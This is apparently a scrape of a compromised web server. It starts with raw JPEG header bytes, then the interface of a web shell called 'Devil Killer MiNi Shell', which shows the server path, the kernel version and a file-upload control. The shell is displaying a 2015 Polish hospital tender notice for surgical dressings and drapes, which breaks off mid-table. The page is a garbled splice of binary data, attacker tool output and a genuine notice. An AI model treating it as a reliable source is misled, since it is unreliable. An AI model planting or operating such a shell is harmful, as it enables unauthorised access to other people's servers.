JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20151102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20151102/293462-N-2015.html

<p class="kh_header"><b>Włocławek: DZP/83/2015 Dostawa wyrobów medycznych - opatrunki i obłożenia pola operacyjnego</b><br>
<b>Numer ogłoszenia: 293462 - 2015; data zamieszczenia: 02.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny we Włocławku , Ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 412 94 13, faks 54 412 94 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.szpital.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DZP/83/2015 Dostawa wyrobów medycznych - opatrunki i obłożenia pola operacyjnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa wyrobów medycznych - opatrunki i obłożenia pola operacyjnego do Apteki Szpitalnej Wojewódzkiego Szpitala Specjalistycznego im. błogosławionego księdza Jerzego Popiełuszki we Włocławku licząc od dnia zawarcia umowy do dnia 31.05.2016 r. Dokładny opis przedmiotu zamówienia zawarty jest w załącznikach niniejszego ogłoszenia. 

Uwaga:

1.   Nie dopuszcza się składania ofert wariantowych. 
2.  Dopuszcza się składanie ofert częściowych na poszczególne zadania. Poprzez ofertę częściową Zamawiający rozumie ofertę zawierającą wszystkie pozycje w zadaniu.
3.  Przedmiot zamówienia ma być dostarczony w opakowaniu producenta.
4. Wykonawca będzie dostarczał towar oznakowany na opakowaniach z następującymi danymi: nazwa towaru, ilość, data produkcji, data ważności do użytku, producent.
5.  Zamawiający wymaga dokonania każdej dostawy przedmiotu zamówienia w terminie 3 dni roboczych: od poniedziałku do piątku od daty złożenia zamówienia przez Zamawiającego telefonicznie, faksem lub mailem - przechowywanym przez miesiąc od czasu uzyskania prawidłowo zrealizowanego zamówienia.
6. Wykonawca musi zagwarantować dostępność oferowanego przedmiotu zamówienia przez 
cały okres obowiązywania umowy.
7.  Zamawiający zastrzega, że podane w opisie przedmiotu zamówienia (załącznik nr 2  - do siwz) przewidywane zapotrzebowanie (podane ilości) nie stanowią ilości gwarantowanych przez Zamawiającego, bowiem faktyczny zakres zamówień składanych przez Zamawiającego w czasie obowiązywania umowy zawartej w wyniku przeprowadzonego postępowania o udzielenie zamówienia publicznego uzależniony będzie od potrzeb Zamawiającego związanych z udzielaniem świadczeń zdrowotnych. Jednakże zmniejszenie ilości asortymentu podanych w załączniku nr 2, nie przekroczy 20% ilości przewidzianej w załączniku nr 2 dla danego zadania.
8. Dostarczony przedmiot zamówienia winien być zaopatrzony w etykietę handlową sporządzoną w języku polskim, zawierającą niezbędne informacje potrzebne do bezpiecznego używania dla bezpośredniego użytkownika. Jeśli oryginalna dokumentacja jest sporządzona w innym języku, to Wykonawca dostarczy wraz z oryginałem tłumaczenie na język polski.
9. Wykonawca zobowiązuje się wypełnić formularze asortymentowo - cenowe tylko w kolumnach nr od 6 do 13 (dla zadania nr 18) i w kolumnach od 5 do 12 (dla zadania nr 1-17) natomiast kolumny nr od 1 do 5 (dla zadania nr 18) i kolumny od 1 do 4 (dla zadania nr 1-17), nie mogą być w żaden sposób zmieniane..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.16-6, 33.14.11.10-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy ( zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek Zamawiający uzna za spełniony jeżeli Wykonawca wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 dostawę do każdego z zadań w zakresie dostawy wyrobów medycznych - opatrunki i obłożenia pola operacyjnego o wartości minimum PLN brutto :
	
Zadanie nr 1-	    300,00 PLN	,Zadanie nr 10	-1 100,00 PLN
Zadanie nr 2	-  2 400,00 PLN	,Zadanie nr 11	-2 500,00 PLN
Zadanie nr 3	- 8 500,00 PLN	,Zadanie nr 12	-400,00 PLN
Zadanie nr 4	-  4 000,00 PLN	,Zadanie nr 13	-1 000,00 PLN
Zadanie nr 5	-   6 300,00 PLN	,Zadanie nr 14	-290,00 PLN
Zadanie nr 6	-     15 500,00 PLN	,Zadanie nr 15	-2 100,00 PLN
Zadanie nr 7	-  1 500,00 PLN	,Zadanie nr 16	-900,00 PLN
Zadanie nr 8	-   4 000,00 PLN	,Zadanie nr 17	-4 200,00 PLN
Zadanie nr 9	-      2 600,00 PLN	,Zadanie nr 18	-40 200,00 PLN

w ramach jednego kontraktu - odpowiednio w każdym zadaniu. W przypadku gdy Wykonawca składa ofertę na kilka zadań, Zamawiający dopuszcza wykazanie się przez Wykonawcę jedną dostawą w ramach jednego kontraktu na wartość równą lub wyższą od sumy wartości wskazanych w ww. warunku obliczonych dla danych zadań.
Np. w przypadku gdyby Wykonawca składał ofertę na zadanie nr 2, zadanie nr 9 i zadanie nr 18 to może wykazać się doświadczeniem w wykonaniu co najmniej 1 dostawy w ramach jednego kontraktu na wartość co najmniej 45 200,00 PLN brutto. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie dokumentu wykazu wykonanych, a w przypadku świadczeń okresowych i ciągłych, również wykonywanych dostaw w zakresie dostaw objętych przedmiotem zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie (zał. nr 6 do siwz) oraz dowodów, czy zostały wykonane lub są wykonywane należycie oraz oświadczenia Wykonawcy ( zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy (zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy (zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy (zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia. 

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.

Wszystkie warunki wymienione w pkt.III.3) muszą być spełnione łącznie. Zamawiający dokona wyboru oferty spośród ofert niepodlegających odrzuceniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Celem potwierdzenia, że oferowana dostawa odpowiada opisowi przedmiotu zamówienia Zamawiający żąda dokumentów wymienionych w Rozdziale III, w kolumnie II tabeli nr 1 do siwz.

Tabela nr 1:

Wymaganie. I. Oferowany przedmiot zamówienia musi być dopuszczony do obrotu i do używania zgodnie z ustawą o wyrobach medycznych z dnia 20 maja 2010 r. (Dz. U. z 2015 r., poz. 876).
II. Dokument na potwierdzenie spełnienia wymagań: 
1. Deklaracja zgodności CE, chyba że ustawa o wyrobach medycznych stanowi inaczej;
2. Dokument potwierdzający dokonanie odpowiednio : zgłoszenia lub powiadomienia o wprowadzeniu wyrobu medycznego do obrotu, chyba że ustawa o wyrobach medycznych stanowi inaczej; 
3.      Dokument potwierdzający
przeprowadzenie procedury oceny zgodności wyrobu medycznego z wymaganiami zasadniczymi (certyfikat zgodności wydany przez jednostkę notyfikowaną, uczestniczącą w ocenie zgodności), chyba że ustawa o wyrobach medycznych stanowi inaczej.

W przypadku gdy ustawa o wyrobach medycznych stanowi inaczej i dopuszcza inne dokumenty, niż wymienione w pkt 1-3 powyżej, Wykonawca zobowiązany jest złożyć dokument równoważny dokumentowi wymaganemu w siwz, zgodnie z ustawą o wyrobach medycznych.

a/ Wykonawcy składający ofertę wspólnie, na podstawie art. 23 ustawy Prawo zamówień publicznych (dotyczy m.in. spółki cywilnej i tzw. konsorcjum), zobowiązani są, poza dokumentami wymienionymi wyżej, do złożenia dokumentu ustanawiającego pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wymagania zawarte w niniejszej specyfikacji dotyczące (wykonawcy) w zakresie obowiązku złożenia stosownych oświadczeń i dokumentów stosuje się odpowiednio do wszystkich wykonawców składających ofertę wspólnie. Jeżeli oferta wykonawców, składających ofertę wspólnie zostanie wybrana, zamawiający może przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców. 
b/ pisemne zobowiązanie innych podmiotów do udostępnienia określonych zasobów na zasadach określonych w art. 26 ust. 2 b ustawy Pzp - dotyczy, gdy Wykonawca korzysta z powyższej możliwości. 
c/ Wszystkie dokumenty muszą być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do podpisania oferty.
d/ Pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów rejestracyjnych) w przypadku podpisywania oferty przez osobę nie wpisaną do dokumentów rejestracyjnych. Pełnomocnictwo należy złożyć w oryginale lub w formie kopii poświadczonej za zgodność przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony przewidują możliwość istotnych zmian umowy w stosunku do treści oferty w przypadku,  gdy:
a/   nastąpi obniżenie ceny;
b/   nastąpi zmiana stawki podatku VAT - Zamawiający dopuszcza możliwość wzrostu cen  
jednostkowych brutto w przypadku zmiany stawki podatku od towarów i usług VAT. Zmiana cen brutto związana ze zmianą stawki podatku VAT może nastąpić najwcześniej z dniem  wejścia w życie aktu prawnego wprowadzającego zmianę stawki podatku VAT, z uwzględnieniem obowiązujących regulacji;
c/  nastąpi zmiana wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę - Zamawiający dopuszcza możliwość wzrostu cen jednostkowych netto, wraz z konsekwencjami rachunkowymi, w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę. Zmiana związana ze zmianą wysokości minimalnego wynagrodzenia za pracę może nastąpić nie wcześniej niż z dniem wejścia w życie aktu prawnego wprowadzającego zmianę wysokości wynagrodzenia minimalnego za pracę. Podstawą do dokonania zmiany w opisanym wyżej zakresie będzie pisemny wniosek Wykonawcy złożony Zamawiającemu, zawierający dokładny opis proponowanej zmiany, uzasadnienie wniosku wynikające z regulacji art. 142 ust. 5 pkt 2 uPzp oraz wykazanie wpływu proponowanej zmiany na koszty wykonania zamówienia przez Wykonawcę. Zamawiający uprawniony będzie do żądania od Wykonawcy wyjaśnień i dowodów na okoliczności zawarte przez niego we wniosku o zmianę (zdanie poprzedzające) w celu jednoznacznego rozstrzygnięcia spełnienia przesłanek opisanych w art. 142 ust. 5 uPzp;
d/  nastąpi zmiana zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne -  Zamawiający dopuszcza możliwość wzrostu cen jednostkowych netto, wraz z konsekwencjami rachunkowymi, w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. Zmiana związana ze zmianą zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne może nastąpić nie wcześniej niż z dniem wejścia w życie aktu prawnego wprowadzającego zmianę zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. Podstawą do dokonania zmiany w opisanym wyżej zakresie będzie pisemny wniosek Wykonawcy złożony Zamawiającemu, zawierający dokładny opis proponowanej zmiany, uzasadnienie wniosku wynikające z regulacji art. 142 ust. 5 pkt 3 uPzp oraz wykazanie wpływu proponowanej zmiany na koszty wykonania zamówienia przez Wykonawcę. Zamawiający uprawniony będzie do żądania od Wykonawcy wyjaśnień i dowodów na okoliczności zawarte przez niego we wniosku o zmianę (zdanie poprzedzające) w celu jednoznacznego rozstrzygnięcia spełnienia przesłanek opisanych w art. 142 ust. 5 uPzp;
e/  nastąpią zmiany osób wskazanych przez strony do realizacji umowy;
        f/  nastąpi zmiana numeru katalogowego nie powodująca zmiany przedmiotu umowy;
        g/  zmiany terminu obowiązywania umowy, zgodnie z § 4 ust. 2 i 3 wzoru umowy. 
2. Zamawiający dopuszcza także w szczególnych sytuacjach i za jego pisemną zgodą w trakcie trwania umowy zmianę przedmiotu umowy dostarczanego przez Wykonawcę, w szczególności w sytuacji gdy zaprzestano lub zawieszono produkcję danego towaru objętego umową, na inny towar o parametrach nie gorszych niż opisane w SIWZ, przy czym cena tego towaru zamiennego nie może przekraczać ceny towaru, na który została podpisana umowa. W przypadku zaprzestania lub zawieszenia produkcji towaru objętego umową Wykonawca winien udokumentować ten fakt.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny
im. błogosławionego księdza Jerzego Popiełuszki we Włocławku
ul. Wieniecka 49
87-800 Włocławek. Budynek administracji, pokój nr 304..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2015 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny
im. błogosławionego księdza Jerzego Popiełuszki we Włocławku
ul. Wieniecka 49
87-800 Włocławek. Budynek administracji, pokój nr 304.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Opis wyrobu	Jednostka	Potrzebna	
 	 	miary	(j.m.) ilość do dnia 31.05.2016r.	  
 	 

1	Zestaw do laparoskopii ginekologicznej:	1 zestaw	12	 	 	 	 	 	 	 	 
	Serweta chirurgiczna do laparoskopii ginekologicznej o wymiarach 180/270x220 cm, zintegrowana										
	z nogawicami, posiada otwór w kształcie trapezu w okolicach jamy brzusznej o wymiarach -										
	wysokość 20 cm, dolna podstawa 30 cm, górna podstawa 20 cm, oraz otwór w okolicach krocza										
	z zabezpieczeniami w postaci osłony o wymiarach 10x15 cm - 1 szt. Laminat dwuwarstwowy o gramaturze 63g/m2. Odporność na przenikanie cieczy min.162 H2O. Wytrzymałość na wypychanie na sucho/mokro 180/158 kPa										
	Taśma samoprzylepna 9x49cm - 1 szt.										
	Kieszeń dwukomorowa samoprzylepna ze sztywnikiem 2x15x40 cm - 1 szt.										
	Osłony na przewody17x200cm - 2 szt.										
	Ręczniki chłonne 30x40cm - 2 szt.										
	Osłona na stolik MAYO 79x145cm- 1 szt										
